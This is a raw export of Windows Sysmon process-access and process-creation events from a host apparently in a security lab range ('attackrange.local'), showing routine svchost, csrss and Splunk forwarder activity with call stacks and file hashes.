10341000x80000000000000003817Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.717{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003816Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.717{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4326-6000-CB00-000000009A01}3124C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003815Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.717{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003814Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.717{08A6967A-4326-6000-CA00-000000009A01}30843076C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{08A6967A-4326-6000-CB00-000000009A01}3124C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1803d|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003813Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.727{08A6967A-4326-6000-CB00-000000009A01}3124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" generate-sslC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-4326-6000-CA00-000000009A01}3084C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000003812Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.717{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4326-6000-CA00-000000009A01}3084C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003811Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.701{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003810Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.701{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003809Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.701{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003808Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.701{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003807Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.701{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003806Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.701{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003805Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.701{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003804Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.701{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003803Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.701{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003802Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.701{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4326-6000-CA00-000000009A01}3084C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003801Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.701{08A6967A-4326-6000-C900-000000009A01}1722332C:\Windows\system32\cmd.exe{08A6967A-4326-6000-CA00-000000009A01}3084C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003800Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.714{08A6967A-4326-6000-CA00-000000009A01}3084C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{08A6967A-4326-6000-C900-000000009A01}172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1 10341000x80000000000000003799Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.701{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4326-6000-C900-000000009A01}172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003798Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.701{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003797Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.701{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003796Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.701{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003795Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.701{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003794Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.701{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003793Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.701{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003792Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.701{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003791Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.701{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003790Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 